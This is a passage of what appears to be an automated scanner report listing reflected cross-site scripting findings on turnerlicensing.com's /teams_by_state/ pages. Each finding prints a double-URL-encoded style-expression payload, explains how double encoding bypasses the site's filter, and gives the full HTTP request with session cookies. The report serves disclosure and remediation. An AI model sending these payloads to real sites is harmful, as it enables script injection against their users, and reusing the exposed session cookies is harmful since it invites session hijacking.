There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Alaska?4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.80. http://www.turnerlicensing.com/teams_by_state/Arizona [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Arizona
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0e30'style='x:expression(alert(1))'d86d71a4401 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Arizona?a0e30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d86d71a4401=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.81. http://www.turnerlicensing.com/teams_by_state/Arkansas [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Arkansas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1396a'style='x:expression(alert(1))'6e71f63c249 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Arkansas?1396a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276e71f63c249=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.82. http://www.turnerlicensing.com/teams_by_state/Calgary [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Calgary
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7cdd3'style='x:expression(alert(1))'8d075c1b2de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Calgary?7cdd3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278d075c1b2de=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.83. http://www.turnerlicensing.com/teams_by_state/California [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/California
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8313'style='x:expression(alert(1))'73dad229e98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/California?e8313%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773dad229e98=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.84. http://www.turnerlicensing.com/teams_by_state/Colorado [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Colorado
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43f2c'style='x:expression(alert(1))'25987bedbdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Colorado?43f2c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252725987bedbdc=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.85. http://www.turnerlicensing.com/teams_by_state/Connecticut [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Connecticut
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b72d'style='x:expression(alert(1))'146d7de1dc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Connecticut?6b72d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527146d7de1dc2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.86. http://www.turnerlicensing.com/teams_by_state/Delaware [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Delaware
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8bba'style='x:expression(alert(1))'f6b9aaa7370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Delaware?e8bba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f6b9aaa7370=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.87. http://www.turnerlicensing.com/teams_by_state/Edmonton [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Edmonton
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbb0f'style='x:expression(alert(1))'eba22f9b445 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Edmonton?dbb0f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527eba22f9b445=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.88. http://www.turnerlicensing.com/teams_by_state/Florida [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Florida
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6608e'style='x:expression(alert(1))'462ed1390c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Florida?6608e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527462ed1390c5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.89. http://www.turnerlicensing.com/teams_by_state/Georgia [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Georgia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd6fd'style='x:expression(alert(1))'66d636fc045 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Georgia?cd6fd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252766d636fc045=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.90. http://www.turnerlicensing.com/teams_by_state/Hawaii [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Hawaii
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d2a5'style='x:expression(alert(1))'8b5f9f5f3a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Hawaii?8d2a5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278b5f9f5f3a5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.91. http://www.turnerlicensing.com/teams_by_state/Idaho [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Idaho
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b675'style='x:expression(alert(1))'73c56e3d4b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Idaho?1b675%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252773c56e3d4b3=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.92. http://www.turnerlicensing.com/teams_by_state/Illinois [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Illinois
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8939'style='x:expression(alert(1))'a322cf42a27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Illinois?a8939%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a322cf42a27=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.93. http://www.turnerlicensing.com/teams_by_state/Indiana [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Indiana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddb83'style='x:expression(alert(1))'31d9a9bbd80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Indiana?ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.94. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Iowa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a3d8'style='x:expression(alert(1))'57114ddf99c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
